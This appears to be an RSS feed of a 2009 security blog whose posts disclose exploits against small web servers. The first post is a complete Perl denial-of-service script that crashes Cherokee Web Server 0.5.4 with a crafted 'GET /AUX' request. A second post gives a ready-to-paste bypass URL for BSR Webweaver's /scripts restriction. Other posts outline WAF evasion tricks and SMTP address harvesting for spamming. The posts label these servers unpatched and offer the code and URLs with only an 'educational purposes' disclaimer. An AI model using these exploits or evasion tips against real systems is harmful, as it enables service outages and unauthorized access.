<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Network Security Blog</title>
	<atom:link href="http://xc0re.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://xc0re.wordpress.com</link>
	<description>Usman's guide to NetSec !</description>
	<lastBuildDate>Sun, 25 Oct 2009 17:30:37 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='xc0re.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/d8c997553ab4e88cdb172a55d9ea046c?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>Network Security Blog</title>
		<link>http://xc0re.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://xc0re.wordpress.com/osd.xml" title="Network Security Blog" />
		<item>
		<title>Cherokee Web Server 0.5.4 Denial Of Service</title>
		<link>http://xc0re.wordpress.com/2009/10/25/cherokee-web-server-0-5-4-denial-of-service/</link>
		<comments>http://xc0re.wordpress.com/2009/10/25/cherokee-web-server-0-5-4-denial-of-service/#comments</comments>
		<pubDate>Sun, 25 Oct 2009 16:54:49 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[Cherokee Web Server]]></category>
		<category><![CDATA[Denial Of Service]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[perl exploit code]]></category>
		<category><![CDATA[usman saeed]]></category>
		<category><![CDATA[version 0.5.4]]></category>
		<category><![CDATA[vulnerbility]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=103</guid>
		<description><![CDATA[#######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:  Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################
Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
[*] Download Page : http://www.cherokee-project.com/download/windows/
[*] Attack type : Remote
[*] Patch Status : [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=103&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>#######################################################<br />
#<br />
# Name : Cherokee Web Server 0.5.4 Denial Of Service<br />
# Author: Usman Saeed<br />
# Company: Xc0re Security Research Group<br />
# Website:  <a title="Xc0re Security Research Group" href="http://www.xc0re.net" target="_self">Xc0re.net</a><br />
# DATE: 25/10/09<br />
# Tested on Windows !<br />
#######################################################</p>
<p>Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]</p>
<p>[*] Download Page : http://www.cherokee-project.com/download/windows/</p>
<p>[*] Attack type : Remote</p>
<p>[*] Patch Status : Unpatched</p>
<p>[*] Description  : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server ,  the server crashes !</p>
<p>[*] Exploitation :</p>
<p>#!/usr/bin/perl<br />
# Cherokee Web Server 0.5.4 Denial Of Service<br />
# Disclaimer:<br />
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]<br />
# Author: Usman Saeed<br />
# Company: Xc0re Security Research Group<br />
# Website: http://www.xc0re.net<br />
# DATE: [25/10/09]</p>
<p>$host = $ARGV[0];<br />
$PORT = $ARGV[1];</p>
<p>$packet = &#8220;AUX&#8221;;</p>
<p>$stuff = &#8220;GET /&#8221;.$packet.&#8221; HTTP/1.1\r\n&#8221; .<br />
&#8220;User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n&#8221; .<br />
&#8220;Host:127.0.0.1\r\n&#8221;.<br />
&#8220;Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n&#8221;.<br />
&#8220;Accept-Language: en-US,en;q=0.9\r\n&#8221;.<br />
&#8220;Accept-Charset: iso-8859-1,*,utf-8\r\n&#8221;.<br />
&#8220;Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n&#8221;;</p>
<p>use IO::Socket::INET;<br />
if (! defined $ARGV[0])<br />
{<br />
print &#8220;+========================================================+\n&#8221;;<br />
print &#8220;+ Program [Cherokee Web Server 0.5.4 Denial Of Service]  +\n&#8221;;<br />
print &#8220;+ Author [Usman Saeed]                                   +\n&#8221;;<br />
print &#8220;+ Company [Xc0re Security Research Group]                +\n&#8221;;<br />
print &#8220;+ DATE: [25/10/09]                                       +\n&#8221;;<br />
print &#8220;+ Usage :perl sploit.pl webserversip wbsvrport           +\n&#8221;;<br />
print &#8220;+ Disclaimer: [This code is for Educational Purposes ,   +\n";<br />
print "+ I would Not be responsible for any misuse of this code]+\n&#8221;;<br />
print &#8220;+========================================================+\n&#8221;;</p>
<p>exit;<br />
}</p>
<p>$sock = IO::Socket::INET-&gt;new( Proto =&gt; &#8220;tcp&#8221;,PeerAddr  =&gt; $host , PeerPort  =&gt; $PORT) || die &#8220;Cant connect to $host!&#8221;;<br />
print &#8220;+========================================================+\n&#8221;;<br />
print &#8220;+ Program [Cherokee Web Server 0.5.4 Denial Of Service]  +\n&#8221;;<br />
print &#8220;+ Author [Usman Saeed]                                   +\n&#8221;;<br />
print &#8220;+ Company [Xc0re Security Research Group]                +\n&#8221;;<br />
print &#8220;+ DATE: [25/10/09]                                       +\n&#8221;;<br />
print &#8220;+ Usage :perl sploit.pl webserversip wbsvrport           +\n&#8221;;<br />
print &#8220;+ Disclaimer: [This code is for Educational Purposes ,   +\n";<br />
print "+ I would Not be responsible for any misuse of this code]+\n&#8221;;<br />
print &#8220;+========================================================+\n&#8221;;</p>
<p>print &#8220;\n&#8221;;</p>
<p>print &#8220;[*] Initializing\n&#8221;;</p>
<p>sleep(2);</p>
<p>print &#8220;[*] Sendin DOS Packet \n&#8221;;</p>
<p>send ($sock , $stuff , 0);<br />
print &#8220;[*] Crashed <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  \n&#8221;;<br />
$res = recv($sock,$response,1024,0);<br />
print $response;</p>
<p>exit;</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/103/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=103&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/10/25/cherokee-web-server-0-5-4-denial-of-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>
	</item>
		<item>
		<title>BSR Webweaver 1.33 /script security Bypass vulnerability</title>
		<link>http://xc0re.wordpress.com/2009/09/15/bsr-webweaver-1-33-script-bypass/</link>
		<comments>http://xc0re.wordpress.com/2009/09/15/bsr-webweaver-1-33-script-bypass/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 18:34:39 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[BSR-webweaver]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[scripts]]></category>
		<category><![CDATA[version 1.33]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=93</guid>
		<description><![CDATA[BSR Webweaver 1.33 
Author : Usman Saeed , Exploit @ Xc0re Security Research Group.
[*] Date: 15/09/09
[*] http://www.brswebweaver.com/downloads.html
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=93&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><h2><span style="color:#ff0000;">BSR Webweaver 1.33 </span></h2>
<p>Author : Usman Saeed , <a href="http://www.xc0re.net/index.php?p=1_20_BSR-Webweaver-1.33-/scripts-access-restriction-bypass-vulnerability" target="_blank">Exploit @ Xc0re Security Research Group</a>.</p>
<p>[*] Date: 15/09/09</p>
<p>[*] http://www.brswebweaver.com/downloads.html</p>
<p>[*] Attack type : Remote</p>
<p>[*] Patch Status : Unpatched</p>
<p>[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.<br />
This is the reason this exploit is not called a Directory Listing Exploit !</p>
<p>[*] Exploitation :</p>
<p>[+] http://[host]/scripts/%bg%ae%bg%ae/.exe</p>
<p><span style="color:#ff0000;"> </span></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/93/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=93&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/09/15/bsr-webweaver-1-33-script-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>
	</item>
		<item>
		<title>Kolibri+ Webserver 2 Multiple Vulnerabilities</title>
		<link>http://xc0re.wordpress.com/2009/09/08/kolibri-webserver-2-multiple-vulnerabilities/</link>
		<comments>http://xc0re.wordpress.com/2009/09/08/kolibri-webserver-2-multiple-vulnerabilities/#comments</comments>
		<pubDate>Tue, 08 Sep 2009 16:08:23 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[Directory Traversal]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[GET]]></category>
		<category><![CDATA[Http Server]]></category>
		<category><![CDATA[Kolibri+ Webserver 2]]></category>
		<category><![CDATA[Port]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=81</guid>
		<description><![CDATA[
Kolibri+ Webserver 2 suffers from multiple vulnerabilities namely Directory Traversal &#38;  Denial OF Service. Vulnerability was reported on 6th of September 2009 by Xc0re Security Research Group.
 http://xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities 
An attacker can easily crash the server , or send a crafted http request to escape the root directory and view any file , even outside the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=81&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p style="text-align:center;"><a href="http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html"><img class="aligncenter" title="Kolibri+ Webserver 2" src="http://img.brothersoft.com/screenshots/softimage/k/kolibri+_webserver-238613-1242118065.jpeg" alt="" width="274" height="216" /></a></p>
<p><strong>Kolibri+ Webserver 2</strong> suffers from multiple vulnerabilities namely Directory Traversal &amp;  Denial OF Service. Vulnerability was reported on 6th of September 2009 by Xc0re Security Research Group.</p>
<p><span style="color:#3366ff;"><a href="http://www.xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities" target="_blank"> http://xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities </a></span></p>
<p>An attacker can easily crash the server , or send a crafted http request to escape the root directory and view any file , even outside the root directory.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/81/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/81/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/81/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=81&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/09/08/kolibri-webserver-2-multiple-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>

		<media:content url="http://img.brothersoft.com/screenshots/softimage/k/kolibri+_webserver-238613-1242118065.jpeg" medium="image">
			<media:title type="html">Kolibri+ Webserver 2</media:title>
		</media:content>
	</item>
		<item>
		<title>Web Application firewall bypass !</title>
		<link>http://xc0re.wordpress.com/2009/07/06/web-application-firewall-bypass/</link>
		<comments>http://xc0re.wordpress.com/2009/07/06/web-application-firewall-bypass/#comments</comments>
		<pubDate>Sun, 05 Jul 2009 20:09:06 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Firewall Evasion]]></category>
		<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[Bypass WAF]]></category>
		<category><![CDATA[detection]]></category>
		<category><![CDATA[exploitation]]></category>
		<category><![CDATA[hack firewalls]]></category>
		<category><![CDATA[intrusion]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Web applicattion firewalls]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=76</guid>
		<description><![CDATA[
Web Application security is very important nowadays ! especially due to ecommerce. Hence Web Application firewalls came into being ! which automatically filter out the malicious query string. And many high end technology giants have them installed !
But what IF ???!!!
Some one bypasses the WAF (Web Application Firewalls) , and because of the WAF, the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=76&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p style="text-align:center;"><img class="size-full wp-image-77 aligncenter" title="security" src="http://xc0re.files.wordpress.com/2009/06/security_2.jpg?w=250&#038;h=235" alt="security" width="250" height="235" /></p>
<p>Web Application security is very important nowadays ! especially due to ecommerce. Hence Web Application firewalls came into being ! which automatically filter out the malicious query string. And many high end technology giants have them installed !</p>
<h2>But what IF ???!!!</h2>
<p>Some one bypasses the WAF (Web Application Firewalls) , and because of the WAF, the programmers dont give much thought to filer or properly sanitize the input ! And once by passed  then its all good for the attacker !</p>
<h2><span style="color:#800000;">Detecting WAF ! </span></h2>
<p>WAFs can easily be detected by the response one gets in the http request ! For instance some WAFs give off wierd response codes ! such as 901 ! Some give  40x  errors even thought he file exists !  Some drop the packets through FIN/RST ! so if the response is analysed one can easily determine whether the firewall is there or not or of which vendor it belongs to !</p>
<h2><span style="color:#800000;">Bypassing WAF ! </span></h2>
<ul>
<li>Encoding the input into hex or Unicode !</li>
<li>One can split their input strings using &amp; and can easily bypass the WAF ! (esp the attack used for Modsecurity WAF)</li>
<li>Even WAF have vulnerabilities such as XSS ! Thus can be easily by passed !</li>
</ul>
<p>To conclude one can say that due to the premade rules of the WAFs it becomes predictable and very easy to bypass !</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/76/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=76&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/07/06/web-application-firewall-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>

		<media:content url="http://xc0re.files.wordpress.com/2009/06/security_2.jpg" medium="image">
			<media:title type="html">security</media:title>
		</media:content>
	</item>
		<item>
		<title>Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities</title>
		<link>http://xc0re.wordpress.com/2009/04/10/cisco-subscriber-edge-services-manager-cross-site-scripting-and-html-injection-vulnerabilities/</link>
		<comments>http://xc0re.wordpress.com/2009/04/10/cisco-subscriber-edge-services-manager-cross-site-scripting-and-html-injection-vulnerabilities/#comments</comments>
		<pubDate>Fri, 10 Apr 2009 13:15:01 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[subscriber manager]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/2009/04/10/cisco-subscriber-edge-services-manager-cross-site-scripting-and-html-injection-vulnerabilities/</guid>
		<description><![CDATA[Hello ! recently i found a vulnerability in Cisco Subscriber Edge Services Manager which enables the attacker to exploit the XSS and HTML Injection bug ! Details can be checked on Xc0re
I think all the versions are affected !
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=70&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Hello ! recently i found a vulnerability in Cisco Subscriber Edge Services Manager which enables the attacker to exploit the XSS and HTML Injection bug ! Details can be checked on <a href="http://www.xc0re.net/index.php?p=1_17_Cisco-Subscriber-Edge-Services-Manager-Multiple-Vulnerabilities">Xc0re</a><br />
I think all the versions are affected !</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/70/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=70&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/04/10/cisco-subscriber-edge-services-manager-cross-site-scripting-and-html-injection-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>
	</item>
		<item>
		<title>Email Id leak in email servers !</title>
		<link>http://xc0re.wordpress.com/2009/04/04/email-id-leak-in-email-servers/</link>
		<comments>http://xc0re.wordpress.com/2009/04/04/email-id-leak-in-email-servers/#comments</comments>
		<pubDate>Fri, 03 Apr 2009 19:33:12 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[port 25]]></category>
		<category><![CDATA[smtp]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=61</guid>
		<description><![CDATA[
Actually servers as illustrated in the above picture some times leak email ids which help spammers to pin point an email address to spam ! As seen above  xt3m3@&#60;target host.com&#62; didnt work because it didnt exist and the server gave a message user unknown ! Attempts are made until a legit email isnt discovered thus the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=61&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img class="aligncenter size-medium wp-image-63" title="smtp-stuff" src="http://xc0re.files.wordpress.com/2009/04/smtp-stuff.jpg?w=300&#038;h=225" alt="smtp-stuff" width="300" height="225" /></p>
<p>Actually servers as illustrated in the above picture some times leak email ids which help spammers to pin point an email address to spam ! As seen above  xt3m3@&lt;target host.com&gt; didnt work because it didnt exist and the server gave a message <span style="color:#800000;">user unknown ! <span style="color:#000000;">Attempts are made until a legit email isnt discovered thus the server giving a reply Recipent Ok .</span></span></p>
<p><span style="color:#800000;"><span style="color:#000000;">This not a serious threat  but then again once emails are attained then sending trojans , worms and virus is a normal practice ! But mostly it is used for Spamming ! </span></span></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/61/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/61/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/61/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=61&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/04/04/email-id-leak-in-email-servers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>

		<media:content url="http://xc0re.files.wordpress.com/2009/04/smtp-stuff.jpg?w=300" medium="image">
			<media:title type="html">smtp-stuff</media:title>
		</media:content>
	</item>
		<item>
		<title>if { web applications } then {system intrusion}</title>
		<link>http://xc0re.wordpress.com/2009/03/28/if-web-applications-then-system-intrusion/</link>
		<comments>http://xc0re.wordpress.com/2009/03/28/if-web-applications-then-system-intrusion/#comments</comments>
		<pubDate>Sat, 28 Mar 2009 18:49:12 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=48</guid>
		<description><![CDATA[Now ! a days every one hears about ASP , PHP or Asp.net.
These frameworks have enabled programmers to make dynamic websites. Well web applications can be a heaven for some but a disaster for others  .
Let me directly cut to the chase . Well for instance  you encounter a website www[.]dummy[.]org  which runs ASP. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=48&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><h1><strong><span style="color:#666699;">Now !</span></strong> a days every one hears about ASP , PHP or Asp.net.</h1>
<p>These frameworks have enabled programmers to make dynamic websites. Well web applications can be a heaven for some but a disaster for others <strong><span style="color:#666699;"> .</span></strong></p>
<p>Let me directly cut to the chase . Well for instance  you encounter a website <span style="color:#ff0000;">www[.]dummy[.]org  <span style="color:#000000;">which runs <strong>ASP. </strong></span></span><span style="color:#ff0000;"><span style="color:#000000;">The Dummy.org&#8217;s server is guarded by a very sophisticated firewall. you find a script login.asp which has fields username and password ! You some how hack into it <strong><span style="color:#3366ff;">[For details about how to bypass core firewall and webapplication attacks visit <a href="http://xc0re.net/index.php?p=1_10_Knowledge-Core">Xc0re Knowledge Core</a> ] </span></strong>and see that the login interface has a full control over the server and the website , you do nothing just log out ! </span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;">Now after that who needs to hackinto the box , download a rootkit and try to hackin without authentication <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ! </span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;">Peace ! </span></span></p>
